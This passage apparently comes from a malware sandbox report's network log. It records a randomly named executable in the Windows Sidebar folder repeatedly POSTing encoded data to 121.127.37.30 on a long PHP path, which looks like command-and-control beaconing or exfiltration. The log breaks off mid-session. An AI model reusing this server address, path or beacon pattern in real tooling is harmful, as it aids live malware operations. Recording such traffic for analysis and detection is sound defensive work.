                                                Dec 5, 2024 16:02:54.652755976 CET471OUTPOST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:02:55.002866983 CET2564OUTData Raw: 50 57 5a 5c 5e 59 51 58 5e 5e 51 57 50 58 5a 5f 59 53 58 40 5b 50 52 5b 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: PWZ\^YQX^^QWPXZ_YSX@[PR[[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9+<.&/!7'4);(&?)457R)?[(8(X&>=R+!Y""Z)-


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                25192.168.2.749832121.127.37.30807528C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 5, 2024 16:02:55.749274969 CET471OUTPOST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 1452
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:02:56.096652985 CET1452OUTData Raw: 50 57 5f 5b 5e 5b 51 5e 5e 5e 51 57 50 52 5a 5d 59 50 58 46 5b 51 52 5a 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: PW_[^[Q^^^QWPRZ]YPXF[QRZ[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9*%'!"'+*,Y>%/=936?>1'?(8Y0=)T?!Y""Z)
                                                Dec 5, 2024 16:02:57.087403059 CET25INHTTP/1.1 100 Continue
                                                Dec 5, 2024 16:02:57.320502043 CET380INHTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:02:56 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Vary: Accept-Encoding
                                                Content-Length: 152
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 06 1e 20 59 34 3e 2a 12 22 29 34 0c 2d 2e 3c 13 30 30 31 1c 27 20 3b 02 26 2d 1b 50 27 28 3f 53 36 05 2b 5b 35 07 27 5c 23 01 2b 12 24 27 28 46 0c 1d 21 07 24 01 3a 0d 2a 5f 2f 0e 2c 05 2d 40 29 0a 3a 5b 2e 10 36 16 3e 0d 00 0e 3c 3a 3e 1c 32 01 3c 59 24 3a 07 06 3f 30 30 01 26 25 20 53 00 14 26 0c 3d 57 3a 0b 3e 11 29 5a 21 3f 3b 09 3c 3b 2d 02 31 3b 2e 12 26 27 20 01 26 3a 24 52 23 51 23 55 2b 2e 00 59 31 12 0e 5d 2a 23 26 5c 21 05 20 57 00 3d 59 56
                                                Data Ascii: Y4>*")4-.<001' ;&-P'(?S6+[5'\#+$'(F!$:*_/,-@):[.6><:>2<Y$:?00&% S&=W:>)Z!?;<;-1;.&' &:$R#Q#U+.Y1]*#&\! W=YV


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                26192.168.2.749833121.127.37.30807528C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 5, 2024 16:02:55.873297930 CET471OUTPOST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2552
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:02:56.221597910 CET2552OUTData Raw: 55 54 5a 5d 5e 51 51 59 5e 5e 51 57 50 5a 5a 59 59 55 58 42 5b 5e 52 5c 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: UTZ]^QQY^^QWPZZYYUXB[^R\[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9^=?_3?>4Q4*<>%8Y=;5?+T(1+[(?3.*?!Y""Z)!
                                                Dec 5, 2024 16:02:57.202172995 CET25INHTTP/1.1 100 Continue
                                                Dec 5, 2024 16:02:57.436803102 CET207INHTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:02:56 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                27192.168.2.749839121.127.37.30807528C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 5, 2024 16:02:57.683260918 CET447OUTPOST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Dec 5, 2024 16:02:58.034343004 CET2564OUTData Raw: 50 51 5f 58 5b 58 54 5a 5e 5e 51 57 50 52 5a 5a 59 55 58 49 5b 55 52 59 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: PQ_X[XTZ^^QWPRZZYUXI[URY[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]:).X3/>7#>($Y<#>)(5?W(2/_(+3$-!R?!Y""Z)
                                                Dec 5, 2024 16:02:59.011532068 CET25INHTTP/1.1 100 Continue
                                                Dec 5, 2024 16:02:59.244884968 CET151INHTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:02:58 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                28192.168.2.749844121.127.37.30807528C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 5, 2024 16:02:59.479588032 CET471OUTPOST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:02:59.830981970 CET2564OUTData Raw: 50 50 5a 58 5e 5b 51 5f 5e 5e 51 57 50 5e 5a 5b 59 55 58 46 5b 5f 52 58 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: PPZX^[Q_^^QWP^Z[YUXF[_RX[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9])?$/P '+*;;>&;*)3_6Y(("3?+0\$="(?!Y""Z)5
                                                Dec 5, 2024 16:03:00.800514936 CET25INHTTP/1.1 100 Continue
                                                Dec 5, 2024 16:03:01.036755085 CET207INHTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:03:00 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                29192.168.2.749850121.127.37.30807528C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 5, 2024 16:03:01.277158976 CET471OUTPOST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:03:01.627890110 CET2564OUTData Raw: 50 54 5a 5a 5e 51 54 5b 5e 5e 51 57 50 5e 5a 5a 59 5d 58 44 5b 56 52 50 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: PTZZ^QT[^^QWP^ZZY]XD[VRP[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]:)?*\3<=U4Q4\)0^>5 ):(!/><*+#'=)?!Y""Z)5


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                30192.168.2.749853121.127.37.30807528C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 5, 2024 16:03:02.452593088 CET471OUTPOST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 1452
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:03:02.799791098 CET1452OUTData Raw: 55 52 5f 5e 5e 5d 51 58 5e 5e 51 57 50 5d 5a 59 59 5c 58 48 5b 53 52 50 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: UR_^^]QX^^QWP]ZYY\XH[SRP[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9_)?%3?44?='<5))6R*#?8<\3=(/!Y""Z)
                                                Dec 5, 2024 16:03:03.770684958 CET25INHTTP/1.1 100 Continue
                                                Dec 5, 2024 16:03:04.004196882 CET380INHTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:03:03 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Vary: Accept-Encoding
                                                Content-Length: 152
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 06 1e 20 59 37 3e 2e 5f 22 39 33 57 2d 58 3c 11 25 30 21 18 26 55 27 04 32 3d 21 56 26 2b 23 51 36 28 2c 06 22 5f 20 05 34 3f 3f 58 27 1d 28 46 0c 1d 22 12 33 01 2d 56 2a 17 02 1c 2c 2f 2d 05 3e 0d 3e 59 2d 58 22 53 3d 20 3d 1c 3f 3a 39 0f 31 5e 30 58 24 29 39 07 3c 20 34 07 27 35 20 53 00 14 26 0d 2a 32 35 1e 3e 01 29 10 35 05 20 56 3c 2b 0f 07 32 05 3e 1d 25 1a 01 5c 27 29 3c 55 22 37 27 1f 2b 3e 2a 13 26 3c 3c 5b 3d 23 26 5c 21 05 20 57 00 3d 59 56
                                                Data Ascii: Y7>._"93W-X<%0!&U'2=!V&+#Q6(,"_ 4??X'(F"3-V*,/->>Y-X"S= =?:91^0X$)9< 4'5 S&*25>)5 V<+2>%\')<U"7'+>*&<<[=#&\! W=YV


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                31192.168.2.749854121.127.37.30807528C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 5, 2024 16:03:02.575346947 CET471OUTPOST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:03:02.924726963 CET2564OUTData Raw: 55 53 5a 5d 5e 5d 51 58 5e 5e 51 57 50 5f 5a 50 59 52 58 42 5b 53 52 51 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: USZ]^]QX^^QWP_ZPYRXB[SRQ[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]:>/6'?"#4+=]'(%4Z=;^"Y8(!7X(8&-=?/!Y""Z)1
                                                Dec 5, 2024 16:03:03.897723913 CET25INHTTP/1.1 100 Continue
                                                Dec 5, 2024 16:03:04.132088900 CET207INHTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:03:03 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                32192.168.2.749860121.127.37.30807528C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 5, 2024 16:03:04.392101049 CET447OUTPOST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Dec 5, 2024 16:03:04.739388943 CET2564OUTData Raw: 55 52 5f 5e 5e 58 54 59 5e 5e 51 57 50 5e 5a 51 59 52 58 42 5b 50 52 5c 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: UR_^^XTY^^QWP^ZQYRXB[PR\[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9^*>'<:47$=;+?))8!;V(2<(^;0=)(/!Y""Z)5
                                                Dec 5, 2024 16:03:05.688854933 CET25INHTTP/1.1 100 Continue
                                                Dec 5, 2024 16:03:05.924319983 CET151INHTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:03:05 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                33192.168.2.749862121.127.37.30807528C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 5, 2024 16:03:06.170113087 CET447OUTPOST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Dec 5, 2024 16:03:06.518497944 CET2564OUTData Raw: 55 51 5a 58 5b 58 51 5e 5e 5e 51 57 50 5b 5a 50 59 52 58 48 5b 57 52 59 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: UQZX[XQ^^^QWP[ZPYRXH[WRY[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9^+<)&/9U40>/<68=0"/*2<*;<$-2+?!Y""Z)!
                                                Dec 5, 2024 16:03:07.550662994 CET25INHTTP/1.1 100 Continue
                                                Dec 5, 2024 16:03:07.784403086 CET151INHTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:03:07 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                34192.168.2.749867121.127.37.30807528C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 5, 2024 16:03:08.027326107 CET471OUTPOST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:03:08.378076077 CET2564OUTData Raw: 50 52 5a 5b 5e 58 54 53 5e 5e 51 57 50 52 5a 5e 59 56 58 40 5b 55 52 59 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: PRZ[^XTS^^QWPRZ^YVX@[URY[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]:)<2^')T#^)80?%*)X6?#>3<'09?!Y""Z)


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                35192.168.2.749873121.127.37.30807528C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 5, 2024 16:03:09.142648935 CET471OUTPOST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 1412
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:03:09.487966061 CET1412OUTData Raw: 50 52 5a 5b 5b 58 51 5d 5e 5e 51 57 50 5a 5a 58 59 56 58 45 5b 57 52 51 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: PRZ[[XQ]^^QWPZZXYVXE[WRQ[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9Y+/_&,%4 Y)+<5+*7Y <7T=!((8 &>5+?!Y""Z)!
                                                Dec 5, 2024 16:03:10.461905956 CET25INHTTP/1.1 100 Continue
                                                Dec 5, 2024 16:03:10.696468115 CET380INHTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:03:10 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Vary: Accept-Encoding
                                                Content-Length: 152
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 06 1e 20 12 23 5b 3d 00 20 14 06 0d 39 2d 3b 02 24 20 08 43 26 0a 28 5d 27 3d 25 12 32 2b 38 0b 21 3b 3b 15 36 39 37 15 34 01 34 05 26 37 28 46 0c 1d 22 12 24 2b 31 1d 3e 39 24 50 2d 2c 39 46 28 23 2a 59 2e 00 0c 18 2a 23 2e 0d 2b 29 04 56 31 3b 33 01 26 29 2e 17 29 33 3b 1c 24 1f 20 53 00 14 26 08 2b 21 39 57 28 3c 3d 58 22 02 3b 0c 3c 3b 08 1d 25 38 31 0f 27 37 3f 5f 26 00 23 0d 20 19 24 0c 3e 2d 22 10 32 02 0e 5c 3d 23 26 5c 21 05 20 57 00 3d 59 56
                                                Data Ascii: #[= 9-;$ C&(]'=%2+8!;;69744&7(F"$+1>9$P-,9F(#*Y.*#.+)V1;3&).)3;$ S&+!9W(<=X";<;%81'7?_&# $>-"2\=#&\! W=YV


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                36192.168.2.749874121.127.37.30807528C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 5, 2024 16:03:09.262667894 CET471OUTPOST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:03:09.612545967 CET2564OUTData Raw: 55 56 5f 5c 5e 58 51 5e 5e 5e 51 57 50 52 5a 58 59 55 58 44 5b 56 52 5b 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
